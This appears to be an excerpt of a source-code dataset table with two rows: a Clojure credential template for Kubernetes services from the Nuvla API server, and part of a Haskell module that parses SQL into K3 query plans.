_id stringlengths 64 64 | repository stringlengths 6 84 | name stringlengths 4 110 | content stringlengths 0 248k | license null | download_url stringlengths 89 454 | language stringclasses 7
values | comments stringlengths 0 74.6k | code stringlengths 0 248k |
|---|---|---|---|---|---|---|---|---|
4eb834dbb37c69099f8e4fa7b33542f3e1b65d391da8e93354eaac608064d168 | nuvla/api-server | credential_template_infrastructure_service_kubernetes.clj | (ns sixsq.nuvla.server.resources.credential-template-infrastructure-service-kubernetes
"
This credential-template creates a credential for a Kubernetes service.
These credentials include a certificate authority's public certificate ('ca'),
the user's public certificate ('cert'), and the user's private key ('key').
"
(:require
[sixsq.nuvla.auth.utils.acl :as acl-utils]
[sixsq.nuvla.server.resources.common.utils :as u]
[sixsq.nuvla.server.resources.credential-template :as p]
[sixsq.nuvla.server.resources.resource-metadata :as md]
[sixsq.nuvla.server.resources.spec.credential-template-infrastructure-service-coe :as ct-infra-service-coe]
[sixsq.nuvla.server.util.metadata :as gen-md]))
;; Subtype and creation-method identifiers for Kubernetes service credentials.
(def ^:const credential-subtype "infrastructure-service-kubernetes")

(def ^:const method "infrastructure-service-kubernetes")

;; Template ACL: owned by the admin group, viewable by any Nuvla user.
(def ^:const resource-acl (acl-utils/normalize-acl {:owners ["group/nuvla-admin"]
                                                    :view-acl ["group/nuvla-user"]}))

;; No reasonable defaults for :parent, :ca, :cert, :key.
;; Do not provide values for those in the template.
;; The :ca/:cert/:key values below are placeholder strings shown to the
;; client; real values are supplied when a credential is created.
(def ^:const template {:id (str p/resource-type "/" method)
                       :resource-type p/resource-type
                       :acl resource-acl
                       :subtype credential-subtype
                       :method method
                       :ca "ca-public-certificate"
                       :cert "client-public-certificate"
                       :key "client-private-certificate"})
;;
;; multimethods for validation
;;

;; Spec-based validation function for this template's COE schema.
(def validate-fn (u/create-spec-validation-fn ::ct-infra-service-coe/schema))

;; Dispatches validation for resources created via this template's method.
(defmethod p/validate-subtype method
  [resource]
  (validate-fn resource))

;;
;; initialization: register this credential-template
;;

(def resource-metadata (gen-md/generate-metadata ::ns ::p/ns ::ct-infra-service-coe/schema))

(def resource-metadata-create (gen-md/generate-metadata ::ns ::p/ns ::ct-infra-service-coe/schema-create "create"))

;; Registers the template and both metadata documents at service startup.
(defn initialize
  []
  (p/register template)
  (md/register resource-metadata)
  (md/register resource-metadata-create))
| null | https://raw.githubusercontent.com/nuvla/api-server/a64a61b227733f1a0a945003edf5abaf5150a15c/code/src/sixsq/nuvla/server/resources/credential_template_infrastructure_service_kubernetes.clj | clojure | No reasonable defaults for :parent, :ca, :cert, :key.
Do not provide values for those in the template
multimethods for validation
initialization: register this credential-template
| (ns sixsq.nuvla.server.resources.credential-template-infrastructure-service-kubernetes
"
This credential-template creates a credential for a Kubernetes service.
These credentials include a certificate authority's public certificate ('ca'),
the user's public certificate ('cert'), and the user's private key ('key').
"
(:require
[sixsq.nuvla.auth.utils.acl :as acl-utils]
[sixsq.nuvla.server.resources.common.utils :as u]
[sixsq.nuvla.server.resources.credential-template :as p]
[sixsq.nuvla.server.resources.resource-metadata :as md]
[sixsq.nuvla.server.resources.spec.credential-template-infrastructure-service-coe :as ct-infra-service-coe]
[sixsq.nuvla.server.util.metadata :as gen-md]))
(def ^:const credential-subtype "infrastructure-service-kubernetes")
(def ^:const method "infrastructure-service-kubernetes")
(def ^:const resource-acl (acl-utils/normalize-acl {:owners ["group/nuvla-admin"]
:view-acl ["group/nuvla-user"]}))
(def ^:const template {:id (str p/resource-type "/" method)
:resource-type p/resource-type
:acl resource-acl
:subtype credential-subtype
:method method
:ca "ca-public-certificate"
:cert "client-public-certificate"
:key "client-private-certificate"})
(def validate-fn (u/create-spec-validation-fn ::ct-infra-service-coe/schema))
(defmethod p/validate-subtype method
[resource]
(validate-fn resource))
(def resource-metadata (gen-md/generate-metadata ::ns ::p/ns ::ct-infra-service-coe/schema))
(def resource-metadata-create (gen-md/generate-metadata ::ns ::p/ns ::ct-infra-service-coe/schema-create "create"))
(defn initialize
[]
(p/register template)
(md/register resource-metadata)
(md/register resource-metadata-create))
|
f0b3fa131745719727f5ef351e1a4f5a2254234621b20d721a3f460f4c5b3c1a | DaMSL/K3 | SQL.hs | {-# LANGUAGE DoAndIfThenElse #-}
# LANGUAGE LambdaCase #
# LANGUAGE PatternSynonyms #
# LANGUAGE TupleSections #
# LANGUAGE ViewPatterns #
-- TODO:
3 . chain simplification
5 . expression case completion
6 . pushdown in subqueries
7 . subqueries in gbs , prjs , aggs
8 . correlated subqueries , and query decorrelation
-- x. more groupByPushdown, subquery and distributed plan testing
module Language.K3.Parser.SQL where
import Control.Arrow ( (***), (&&&), first, second )
import Control.Monad
import Control.Monad.State
import Control.Monad.Trans.Except
import Data.Function ( on )
import Data.Functor.Identity
import Data.Maybe ( catMaybes )
import Data.Either ( partitionEithers )
import Data.Monoid
import Data.List ( (\\), find, intersect, nub, isInfixOf, isPrefixOf, sortBy, unzip4 )
import Data.Map ( Map )
import Data.Set ( Set )
import Data.Tree
import qualified Data.Map as Map
import qualified Data.Set as Set
import Debug.Trace
import Database.HsSqlPpp.Ast
import Database.HsSqlPpp.Annotation hiding ( Annotation )
import qualified Database.HsSqlPpp.Annotation as HA ( Annotation )
import Database.HsSqlPpp.Parser
import Database.HsSqlPpp.Pretty
import Language.K3.Core.Annotation
import Language.K3.Core.Common
import Language.K3.Core.Declaration
import Language.K3.Core.Expression
import Language.K3.Core.Type
import Language.K3.Core.Literal
import Language.K3.Core.Metaprogram
import Language.K3.Core.Utils
import qualified Language.K3.Core.Constructor.Declaration as DC
import qualified Language.K3.Core.Constructor.Expression as EC
import qualified Language.K3.Core.Constructor.Literal as LC
import qualified Language.K3.Core.Constructor.Type as TC
import Language.K3.Utils.Pretty
import Language.K3.Utils.Pretty.Syntax
-- | A SQL operator application: a K3 operator together with its
--   unevaluated scalar-expression operand(s).
data OperatorFn = UnaryOp Operator ScalarExpr
                | BinaryOp Operator ScalarExpr ScalarExpr
                deriving (Eq, Show)

-- | The aggregate functions recognized by the parser (see 'aggregateexpr').
data AggregateFn = AggSum
                 | AggCount
                 | AggMin
                 | AggMax
                 deriving (Eq, Read, Show)
-- | Relation names and types.
type RTypeEnv = Map Identifier (K3 Type)
-- | Attribute dependency graph.
type ADGPtr = Int
data ADGNode = ADGNode { adnn :: Identifier
, adnt :: K3 Type
, adnr :: Maybe Identifier
, adne :: Maybe ScalarExpr
, adnch :: [ADGPtr] }
deriving (Eq, Show)
type ADGraph = Map ADGPtr ADGNode
-- | Scope frames are mappings of name paths (qualified or unqualified) to attributes.
type AttrPath = [Identifier]
type Qualifiers = [[Identifier]]
type AttrEnv = Map AttrPath ADGPtr
type ScopeFrame = (AttrEnv, [AttrPath], Qualifiers)
-- | Scope environments store bindings throughout a query's subexpressions.
type ScopeId = Int
type ScopeEnv = Map ScopeId ScopeFrame
-- | Internal query plan representation.
data QueryClosure = QueryClosure { qcfree :: [AttrPath]
, qcplan :: QueryPlan }
deriving (Eq, Show)
type SubqueryBindings = [(ScalarExpr, (Identifier, QueryClosure))]
data PlanCPath = PlanCPath { pcoutsid :: ScopeId
, pcselects :: ScalarExprList
, pcgroupbys :: ScalarExprList
, pcprojects :: SelectItemList
, pcaggregates :: SelectItemList
, pchaving :: MaybeBoolExpr
, pcbindings :: SubqueryBindings }
deriving (Eq, Show)
data PlanNode = PJoin { pnjprocsid :: ScopeId
, pnjoutsid :: ScopeId
, pnjtype :: Maybe (Natural, JoinType)
, pnjequalities :: [(ScalarExpr, ScalarExpr)]
, pnjpredicates :: ScalarExprList
, pnjpredbinds :: SubqueryBindings
, pnjpath :: [PlanCPath] }
| PSubquery { pnsqoutsid :: ScopeId
, pnqclosure :: QueryClosure }
| PTable { pntid :: Identifier
, pntoutsid :: ScopeId
, pntref :: Maybe TableRef
, pntbindmap :: Maybe BindingMap
, pntpath :: [PlanCPath] }
deriving (Eq, Show)
type PlanTree = Tree PlanNode
data QueryPlan = QueryPlan { qjoinTree :: Maybe PlanTree
, qpath :: [PlanCPath]
, qstageid :: Maybe Identifier }
deriving (Eq, Show)
-- | Binding mappings
type TypePrefix = Identifier
type TypePath = [Identifier]
type TypeMapping = Maybe (Either TypePrefix TypePath)
data BindingMap = BMNone
| BMTPrefix Identifier
| BMTFieldMap (Map Identifier TypePath)
| BMTVPartition (Map Identifier (Identifier, TypeMapping))
deriving (Eq, Show)
-- | Parsing state environment.
data SQLEnv = SQLEnv { relations :: RTypeEnv
, adgraph :: ADGraph
, scopeenv :: ScopeEnv
, aliassym :: ParGenSymS
, adpsym :: ParGenSymS
, spsym :: ParGenSymS
, sqsym :: ParGenSymS
, stgsym :: ParGenSymS
, slblsym :: ParGenSymS
, aggdsym :: ParGenSymS }
deriving (Eq, Show)
-- | A stateful SQL parsing monad.
type SQLParseM = ExceptT String (State SQLEnv)
-- | SQL program statements
data SQLDecl = SQLRel (Identifier, K3 Type)
| SQLStage (Identifier, K3 Type)
| SQLQuery QueryPlan
deriving (Eq, Show)
type StageGraph = [Either Identifier (Identifier, Identifier)]
{- Naming helpers. -}

-- | Name of the materialized output collection for a stage identifier.
materializeId :: Identifier -> Identifier
materializeId = ("output" ++)

-- | Name of the generated stage declaration for a stage identifier.
stageId :: Identifier -> Identifier
stageId = ("stage" ++)
{- Type and alias helpers. -}

-- | Marks a type immutable, replacing any existing mutability qualifier.
immutT :: K3 Type -> K3 Type
immutT t = t @<- ((filter (not . isTQualified) $ annotations t) ++ [TImmutable])

-- | Marks a type mutable, replacing any existing mutability qualifier.
mutT :: K3 Type -> K3 Type
mutT t = t @<- ((filter (not . isTQualified) $ annotations t) ++ [TMutable])

-- | Marks an expression immutable, replacing any existing qualifier.
immutE :: K3 Expression -> K3 Expression
immutE e = e @<- ((filter (not . isEQualified) $ annotations e) ++ [EImmutable])

-- | Marks an expression mutable, replacing any existing qualifier.
mutE :: K3 Expression -> K3 Expression
mutE e = e @<- ((filter (not . isEQualified) $ annotations e) ++ [EMutable])

-- | Builds a tuple expression from immutable components; a singleton list
--   yields the (immutable) component itself rather than a 1-tuple.
tupE :: [K3 Expression] -> K3 Expression
tupE [e] = immutE e
tupE el = EC.tuple $ map immutE el

-- | Builds a record expression with all fields marked immutable.
recE :: [(Identifier, K3 Expression)] -> K3 Expression
recE ide = EC.record $ map (\(i,e) -> (i, immutE e)) ide

-- | Builds a record type with all fields marked immutable.
recT :: [(Identifier, K3 Type)] -> K3 Type
recT idt = TC.record $ map (\(i,t) -> (i, immutT t)) idt
-- | Extracts the element type of a collection type, failing otherwise.
telemM :: K3 Type -> SQLParseM (K3 Type)
telemM (tnc -> (TCollection, [t])) = return t
telemM t = throwE $ boxToString $ ["Invalid relation type"] %$ prettyLines t

-- | Wraps a type as an immutable K3 Collection.
tcolM :: K3 Type -> SQLParseM (K3 Type)
tcolM t = return $ (TC.collection t) @<- [TAnnotation "Collection", TImmutable]

-- | Applies a table alias to a record (element) type. A full alias renames
--   the record's fields (arity must match); simple or absent aliases leave
--   the type unchanged.
taliaselemM :: TableAlias -> K3 Type -> SQLParseM (K3 Type)
taliaselemM alias t@(tnc -> (TRecord ids, ch)) =
  case alias of
    NoAlias _ -> return t
    TableAlias _ _ -> return t
    FullAlias _ _ fnc | length fnc == length ids -> return $ recT $ zip (map sqlnmcomponent fnc) ch
    FullAlias _ _ _ -> throwE $ "Mismatched alias fields length"
taliaselemM _ t = throwE $ boxToString $ ["Invalid relation element type"] %$ prettyLines t

-- | Applies a table alias to a collection-of-records type, preserving the
--   collection's annotations.
taliascolM :: TableAlias -> K3 Type -> SQLParseM (K3 Type)
taliascolM alias t@(tnc -> (TCollection, [et@(tag -> TRecord _)])) =
  taliaselemM alias et >>= \net -> return $ (TC.collection net) @<- (annotations t)
taliascolM _ t = throwE $ boxToString $ ["Invalid relation type"] %$ prettyLines t

-- | Wraps a K3 record type with an 'elem' label.
twrapelemM :: K3 Type -> SQLParseM (K3 Type)
twrapelemM t@(tag -> TRecord _) = return $ recT [("elem", t)]
twrapelemM t = throwE $ boxToString $ ["Invalid element type for wrapping:"] %$ prettyLines t

-- | Wraps a collection's element type with an 'elem' label.
twrapcolelemM :: K3 Type -> SQLParseM (K3 Type)
twrapcolelemM t@(tnc -> (TCollection, [et])) = twrapelemM et >>= \net -> return $ (TC.collection net) @<- annotations t
twrapcolelemM t = throwE $ boxToString $ ["Invalid collection type for wrapping:"] %$ prettyLines t
{- SQLParseM helpers. -}

-- | Runs a parse action, returning the result alongside the final state.
runSQLParseM :: SQLEnv -> SQLParseM a -> (Either String a, SQLEnv)
runSQLParseM env m = flip runState env $ runExceptT m

-- | Runs a parse action, pairing result and final state inside Either;
--   the state is discarded if the action failed.
runSQLParseEM :: SQLEnv -> SQLParseM a -> Either String (a, SQLEnv)
runSQLParseEM env m = r >>= return . (,e)
  where (r,e) = runSQLParseM env m

-- | Runs a parse action, discarding the final state.
evalSQLParseM :: SQLEnv -> SQLParseM a -> Either String a
evalSQLParseM env m = fst $ runSQLParseM env m

-- | Transforms any error raised by the action with the given function.
reasonM :: (String -> String) -> SQLParseM a -> SQLParseM a
reasonM errf = mapExceptT $ \m -> m >>= \case
  Left err -> return $ Left $ errf err
  Right r -> return $ Right r

-- | Fails with the given message.
errorM :: String -> SQLParseM a
errorM msg = reasonM id $ throwE msg

-- | Lifts a pure Except computation into the parse monad.
liftExceptM :: Except String a -> SQLParseM a
liftExceptM = mapExceptT (return . runIdentity)

-- | Lifts an Either value into the parse monad.
liftEitherM :: Either String a -> SQLParseM a
liftEitherM = either throwE return
{- SQLEnv helpers -}
sqlenv0 :: SQLEnv
sqlenv0 = SQLEnv Map.empty Map.empty Map.empty contigsymS contigsymS contigsymS contigsymS contigsymS contigsymS contigsymS
-- | Relation type accessors
srlkup :: RTypeEnv -> Identifier -> Except String (K3 Type)
srlkup env x = maybe err return $ Map.lookup x env
where err = throwE $ "Unknown relation in sql parser environment: " ++ show x
srext :: RTypeEnv -> Identifier -> K3 Type -> RTypeEnv
srext env x t = Map.insert x t env
srdel :: RTypeEnv -> Identifier -> RTypeEnv
srdel env x = Map.delete x env
-- | Dependency graph accessors.
sglkup :: ADGraph -> ADGPtr -> Except String ADGNode
sglkup g p = maybe err return $ Map.lookup p g
where err = throwE $ "Unknown attribute node in sql parser environment: " ++ show p
sgext :: ADGraph -> ADGNode -> ParGenSymS -> (ADGPtr, ParGenSymS, ADGraph)
sgext g n sym = (ptr, nsym, Map.insert ptr n g)
where (nsym, ptr) = gensym sym
-- | Scope environment accessors.

-- | Looks up an attribute pointer by path in a scope frame, failing if absent.
sflkup :: ScopeFrame -> [Identifier] -> Except String ADGPtr
sflkup (fr,_,_) path = maybe err return $ Map.lookup path fr
  where err = throwE $ unwords ["Invalid scope path:", show path, "in", show fr]

-- | Non-failing variant of 'sflkup'.
sftrylkup :: ScopeFrame -> [Identifier] -> Maybe ADGPtr
sftrylkup (fr,_,_) path = Map.lookup path fr

-- | All attribute pointers of a frame, in the frame's attribute order.
sfptrs :: ScopeFrame -> Except String [ADGPtr]
sfptrs sf@(fr, ord, _) = mapM (\p -> sflkup sf p) ord

-- | Adds a path-to-pointer binding, appending the path to the frame's
--   attribute order and registering the path's qualifier (its init) if
--   the path is qualified and the qualifier is new.
sfpush :: ScopeFrame -> [Identifier] -> ADGPtr -> ScopeFrame
sfpush (fr,ord,q) path ptr = (Map.insert path ptr fr, ord ++ [path], nq)
  where nq = if length path > 1 then (if init path `notElem` q then q ++ [init path] else q) else q
-- | Removes a path binding from a scope frame, returning the removed
--   pointer (if any) together with the updated frame. Both the attribute
--   order and the qualifier list are pruned to match the remaining bindings.
sfpop :: ScopeFrame -> [Identifier] -> (Maybe ADGPtr, ScopeFrame)
-- BUG FIX: the order list was computed with `filter (== path) ord`, which
-- kept ONLY the popped path and discarded every other attribute. Popping
-- must remove the popped path and retain the rest.
sfpop (fr,ord,q) path = (npopt, (nfr, filter (/= path) ord, newq))
  where (npopt, nfr) = Map.updateLookupWithKey (\_ _ -> Nothing) path fr
        -- Qualifiers still referenced by some remaining (qualified) key.
        newquals = filter (not . null) $ map (\p -> if length p > 1 then init p else []) $ Map.keys nfr
        newq = filter (`elem` newquals) q
sclkup :: ScopeEnv -> ScopeId -> Except String ScopeFrame
sclkup env p = maybe err return $ Map.lookup p env
where err = throwE $ "Unknown scope: " ++ show p
scpush :: ScopeEnv -> ScopeFrame -> ParGenSymS -> (ScopeId, ParGenSymS, ScopeEnv)
scpush env fr sym = (ptr, nsym, Map.insert ptr fr env)
where (nsym, ptr) = gensym sym
scpop :: ScopeEnv -> (Maybe ScopeFrame, ScopeEnv)
scpop env = if Map.null env then (Nothing, env) else (Just fr, Map.delete sp env)
where (sp, fr) = Map.findMax env
scflkup :: ScopeEnv -> ScopeId -> [Identifier] -> Except String ADGPtr
scflkup env sp path = sclkup env sp >>= \fr -> sflkup fr path
scftrylkup :: ScopeEnv -> ScopeId -> [Identifier] -> Except String (Maybe ADGPtr)
scftrylkup env sp path = sclkup env sp >>= \fr -> return $ sftrylkup fr path
scfptrs :: ScopeEnv -> ScopeId -> Except String [ADGPtr]
scfptrs env sp = sclkup env sp >>= sfptrs
scfpush :: ScopeEnv -> [Identifier] -> ADGPtr -> ParGenSymS -> (ScopeId, ParGenSymS, ScopeEnv)
scfpush env path np sym = if Map.null env then scpush env (Map.singleton path np, [path], pathqual) sym
else (sp, sym, Map.insert sp (sfpush fr path np) env)
where (sp,fr) = Map.findMax env
pathqual = if length path > 1 then [init path] else []
scfpop :: ScopeEnv -> [Identifier] -> (Maybe ADGPtr, ScopeEnv)
scfpop env path = if Map.null env then (Nothing, env) else (npopt, Map.insert sp nfr env)
where (sp, fr) = Map.findMax env
(npopt, nfr) = sfpop fr path
-- | Symbol generation.
-- Each function draws a fresh integer from one of the environment's
-- generator streams and threads the updated generator back into the state.

-- | Fresh alias symbol.
sasext :: SQLEnv -> (Int, SQLEnv)
sasext senv = (n, senv {aliassym = nsym})
  where (nsym, n) = gensym (aliassym senv)

-- | Fresh stage symbol.
stgsext :: SQLEnv -> (Int, SQLEnv)
stgsext senv = (n, senv {stgsym = nsym})
  where (nsym, n) = gensym (stgsym senv)

-- | Fresh subquery symbol.
ssqsext :: SQLEnv -> (Int, SQLEnv)
ssqsext senv = (n, senv {sqsym = nsym})
  where (nsym, n) = gensym (sqsym senv)

-- | Fresh label symbol.
slblsext :: SQLEnv -> (Int, SQLEnv)
slblsext senv = (n, senv {slblsym = nsym})
  where (nsym, n) = gensym (slblsym senv)

-- | Fresh aggregate-declaration symbol.
saggsext :: SQLEnv -> (Int, SQLEnv)
saggsext senv = (n, senv {aggdsym = nsym})
  where (nsym, n) = gensym (aggdsym senv)
-- | State accessors.
sqrlkup :: SQLEnv -> Identifier -> Except String (K3 Type)
sqrlkup senv n = srlkup (relations senv) n
sqrext :: SQLEnv -> Identifier -> K3 Type -> SQLEnv
sqrext senv n t = senv { relations = srext (relations senv) n t }
sqrdel :: SQLEnv -> Identifier -> SQLEnv
sqrdel senv n = senv { relations = srdel (relations senv) n }
sqglkup :: SQLEnv -> ADGPtr -> Except String ADGNode
sqglkup senv p = sglkup (adgraph senv) p
sqgext :: SQLEnv -> ADGNode -> (ADGPtr, SQLEnv)
sqgext senv n = (ptr, senv {adgraph = ng, adpsym = nsym})
where (ptr, nsym, ng) = sgext (adgraph senv) n (adpsym senv)
sqclkup :: SQLEnv -> ScopeId -> Except String ScopeFrame
sqclkup env p = sclkup (scopeenv env) p
sqcpush :: SQLEnv -> ScopeFrame -> (ScopeId, SQLEnv)
sqcpush env fr = (nsp, env {scopeenv = nenv, spsym = nsym})
where (nsp, nsym, nenv) = scpush (scopeenv env) fr (spsym env)
sqcpop :: SQLEnv -> (Maybe ScopeFrame, SQLEnv)
sqcpop env = (fropt, env { scopeenv = nsenv })
where (fropt, nsenv) = scpop (scopeenv env)
sqcflkup :: SQLEnv -> ScopeId -> [Identifier] -> Except String ADGPtr
sqcflkup env sp path = scflkup (scopeenv env) sp path
sqcftrylkup :: SQLEnv -> ScopeId -> [Identifier] -> Except String (Maybe ADGPtr)
sqcftrylkup env sp path = scftrylkup (scopeenv env) sp path
sqcfptrs :: SQLEnv -> ScopeId -> Except String [ADGPtr]
sqcfptrs env sp = scfptrs (scopeenv env) sp
sqcfpush :: SQLEnv -> [Identifier] -> ADGPtr -> (ScopeId, SQLEnv)
sqcfpush env path np = (nsp, env {scopeenv = nsenv, spsym = nsym})
where (nsp, nsym, nsenv) = scfpush (scopeenv env) path np (spsym env)
sqcfpop :: SQLEnv -> [Identifier] -> (Maybe ADGPtr, SQLEnv)
sqcfpop env path = (npopt, env {scopeenv = nsenv})
where (npopt, nsenv) = scfpop (scopeenv env) path
-- | Monadic accessors.
-- Stateful wrappers over the pure SQLEnv accessors above, expressed via
-- MonadState ('state'/'modify'/'get') rather than explicit get/put chains.

sqrlkupM :: Identifier -> SQLParseM (K3 Type)
sqrlkupM n = do { env <- get; liftExceptM $ sqrlkup env n }

sqrextM :: Identifier -> K3 Type -> SQLParseM ()
sqrextM n t = modify $ \env -> sqrext env n t

sqglkupM :: ADGPtr -> SQLParseM ADGNode
sqglkupM p = do { env <- get; liftExceptM $ sqglkup env p }

sqgextM :: ADGNode -> SQLParseM ADGPtr
sqgextM n = state $ \env -> sqgext env n

sqclkupM :: ScopeId -> SQLParseM ScopeFrame
sqclkupM sp = do { env <- get; liftExceptM $ sqclkup env sp }

sqcpushM :: ScopeFrame -> SQLParseM ScopeId
sqcpushM fr = state $ \env -> sqcpush env fr

sqcpopM :: SQLParseM (Maybe ScopeFrame)
sqcpopM = state sqcpop

sqcflkupM :: ScopeId -> [Identifier] -> SQLParseM ADGPtr
sqcflkupM sp path = do { env <- get; liftExceptM $ sqcflkup env sp path }

sqcftrylkupM :: ScopeId -> [Identifier] -> SQLParseM (Maybe ADGPtr)
sqcftrylkupM sp path = do { env <- get; liftExceptM $ sqcftrylkup env sp path }

sqcfptrsM :: ScopeId -> SQLParseM [ADGPtr]
sqcfptrsM sp = do { env <- get; liftExceptM $ sqcfptrs env sp }

sqcfpushM :: [Identifier] -> ADGPtr -> SQLParseM ScopeId
sqcfpushM path np = state $ \env -> sqcfpush env path np

sqcfpopM :: [Identifier] -> SQLParseM (Maybe ADGPtr)
sqcfpopM path = state $ \env -> sqcfpop env path

sasextM :: SQLParseM Int
sasextM = state sasext

stgsextM :: SQLParseM Int
stgsextM = state stgsext

ssqsextM :: SQLParseM Int
ssqsextM = state ssqsext

slblsextM :: SQLParseM Int
slblsextM = state slblsext

saggsextM :: SQLParseM Int
saggsextM = state saggsext
{- Scope construction -}
sqgextScopeM :: Identifier -> [Identifier] -> [ADGPtr] -> SQLParseM ScopeId
sqgextScopeM qualifier ids ptrs = do
let paths = map (:[]) ids
let qpaths = map (\i -> [qualifier,i]) ids
sqcpushM (Map.fromList $ zip paths ptrs ++ zip qpaths ptrs, paths, [[qualifier]])
sqgextSchemaM :: Maybe Identifier -> K3 Type -> SQLParseM ScopeId
sqgextSchemaM (Just n) t = do
rt <- telemM t
case tnc rt of
(TRecord ids, ch) -> do
ptrs <- mapM sqgextM $ map (\(i, ct) -> ADGNode i ct (Just n) Nothing []) $ zip ids ch
sqgextScopeM n ids ptrs
_ -> throwE $ boxToString $ ["Invalid relational element type"] %$ prettyLines rt
sqgextSchemaM _ _ = throwE "No relation name specified when extending attribute graph"
sqgextAliasM :: Maybe Identifier -> K3 Type -> [ADGPtr] -> SQLParseM ScopeId
sqgextAliasM (Just n) t srcptrs = do
rt <- telemM t
case tag rt of
TRecord dstids | length dstids == length srcptrs -> do
destnodes <- mapM mknode $ zip dstids srcptrs
destptrs <- mapM sqgextM destnodes
sqgextScopeM n dstids destptrs
_ -> throwE $ boxToString $ ["Invalid alias type when extending attribute graph"] %$ prettyLines rt
where mknode (d, ptr) = do
node <- sqglkupM ptr
return $ ADGNode d (adnt node) (Just n) (Just $ Identifier emptyAnnotation $ Nmc $ adnn node) [ptr]
sqgextAliasM _ _ _ = throwE "Invalid alias arguments when extending attribute graph"
-- | Extend the attribute graph for a relation type computed from the given expressions.
sqgextExprM :: ScopeId -> Maybe Identifier -> [(Identifier, K3 Type, ScalarExpr)] -> SQLParseM ScopeId
sqgextExprM sid (Just n) exprs = do
nodes <- mapM mknode exprs
ptrs <- mapM sqgextM nodes
sqgextScopeM n (map (\(i,_,_) -> i) exprs) ptrs
where mknode (i, t, e) = do
eptrs <- exprAttrs sid e
return $ ADGNode i t (Just n) (Just e) eptrs
sqgextExprM _ _ _ = throwE "Invalid expr arguments when extending attribute graph"
{- Relation type and name construction. -}
sqltabletype :: AttributeDefList -> SQLParseM (K3 Type)
sqltabletype attrs = sqlrectype attrs >>= tcolM
sqlrectype :: AttributeDefList -> SQLParseM (K3 Type)
sqlrectype attrs = mapM sqlattr attrs >>= \ts -> return (recT ts)
sqlattr :: AttributeDef -> SQLParseM (Identifier, K3 Type)
sqlattr (AttributeDef _ nm t _ _) = sqlnamedtype t >>= return . (sqlnmcomponent nm,)
-- TODO: timestamp, interval, size limits for numbers
sqltype :: String -> Maybe Int -> Maybe Int -> SQLParseM (K3 Type)
sqltype s lpOpt uOpt = case s of
"int" -> return TC.int
"integer" -> return TC.int
"real" -> return TC.real
"double precision" -> return TC.real
"text" -> return TC.string
"varchar" -> return $ maybe TC.string (\i -> TC.string @+ TProperty (Left $ "TPCHVarchar_" ++ show i)) lpOpt
"date" -> return $ TC.int @+ TProperty (Left "TPCHDate")
_ -> throwE $ "Invalid K3-SQL type: " ++ s
sqlnamedtype :: TypeName -> SQLParseM (K3 Type)
sqlnamedtype tn = case tn of
ArrayTypeName _ ctn -> sqlnamedtype ctn >>= \t -> return $ (TC.collection t) @+ TAnnotation "Vector"
Prec2TypeName _ s l u -> sqltype s (Just $ fromInteger l) (Just $ fromInteger u)
PrecTypeName _ s p -> sqltype s (Just $ fromInteger p) Nothing
SetOfTypeName _ ctn -> sqlnamedtype ctn >>= \t -> return $ (TC.collection t) @+ TAnnotation "Set"
SimpleTypeName _ s -> sqltype s Nothing Nothing
sqlnm :: Name -> String
sqlnm (Name _ comps) = concatMap sqlnmcomponent comps
sqlnmcomponent :: NameComponent -> String
sqlnmcomponent (Nmc s) = s
sqlnmcomponent (QNmc s) = s
sqlnmpath :: [NameComponent] -> [String]
sqlnmpath nmcl = map sqlnmcomponent nmcl
sqltablealias :: Identifier -> TableAlias -> Maybe Identifier
sqltablealias def alias = case alias of
NoAlias _ -> Just def
TableAlias _ nc -> Just $ "__" ++ sqlnmcomponent nc
FullAlias _ nc _ -> Just $ "__" ++ sqlnmcomponent nc
-- | Maps a SQL operator name and its argument list to a K3 operator
--   application. Returns Nothing for unrecognized operator/arity pairs.
sqloperator :: String -> ScalarExprList -> Maybe OperatorFn
sqloperator "-"    [x]   = Just (UnaryOp ONeg x)
sqloperator "!not" [x]   = Just (UnaryOp ONot x)
sqloperator "+"    [x,y] = Just (BinaryOp OAdd x y)
sqloperator "-"    [x,y] = Just (BinaryOp OSub x y)
sqloperator "*"    [x,y] = Just (BinaryOp OMul x y)
sqloperator "/"    [x,y] = Just (BinaryOp ODiv x y)
sqloperator "%"    [x,y] = Just (BinaryOp OMod x y)
sqloperator "="    [x,y] = Just (BinaryOp OEqu x y)
sqloperator "!="   [x,y] = Just (BinaryOp ONeq x y)
sqloperator "<>"   [x,y] = Just (BinaryOp ONeq x y)
sqloperator "<"    [x,y] = Just (BinaryOp OLth x y)
-- BUG FIX: "<=" previously mapped to OGeq (greater-or-equal), silently
-- inverting every <= comparison in translated queries; it must be OLeq.
sqloperator "<="   [x,y] = Just (BinaryOp OLeq x y)
sqloperator ">"    [x,y] = Just (BinaryOp OGth x y)
sqloperator ">="   [x,y] = Just (BinaryOp OGeq x y)
sqloperator "!and" [x,y] = Just (BinaryOp OAnd x y)
sqloperator "!or"  [x,y] = Just (BinaryOp OOr x y)
sqloperator _ _ = Nothing
{- SQL AST helpers. -}

-- | Underlying scalar expressions of a projection list.
projectionexprs :: SelectItemList -> ScalarExprList
projectionexprs = map projectionexpr

-- | Underlying scalar expression of a single projection, whether or
--   not it carries an output name.
projectionexpr :: SelectItem -> ScalarExpr
projectionexpr si = case si of
  SelExp _ e -> e
  SelectItem _ e _ -> e

-- | Wraps a scalar expression as an unnamed projection item.
mkprojection :: ScalarExpr -> SelectItem
mkprojection = SelExp emptyAnnotation
aggregateexprs :: SelectItemList -> SQLParseM (ScalarExprList, [AggregateFn])
aggregateexprs sl = mapM aggregateexpr sl >>= return . unzip
aggregateexpr :: SelectItem -> SQLParseM (ScalarExpr, AggregateFn)
aggregateexpr (projectionexpr -> e) = case e of
FunCall _ nm args -> do
let fn = sqlnm nm
case (fn, args) of
("sum" , [e']) -> return (e', AggSum)
("count", [e']) -> return (e', AggCount)
("min" , [e']) -> return (e', AggMin)
("max" , [e']) -> return (e', AggMax)
(_, _) -> throwE $ "Invalid aggregate expression: " ++ show e
_ -> throwE $ "Invalid aggregate expression: " ++ show e
mkaggregate :: AggregateFn -> SelectItem -> ScalarExpr -> SQLParseM SelectItem
mkaggregate fn agg e = case fn of
AggSum -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "sum"]) [e]
AggCount -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "count"]) [e]
AggMin -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "min"]) [e]
AggMax -> rt agg $ FunCall emptyAnnotation (Name emptyAnnotation [Nmc "max"]) [e]
where rt (SelExp _ _) e' = return (SelExp emptyAnnotation e')
rt (SelectItem _ _ nmc) e' = return (SelectItem emptyAnnotation e' nmc)
-- | Tests whether a scalar expression is a recognized aggregate call.
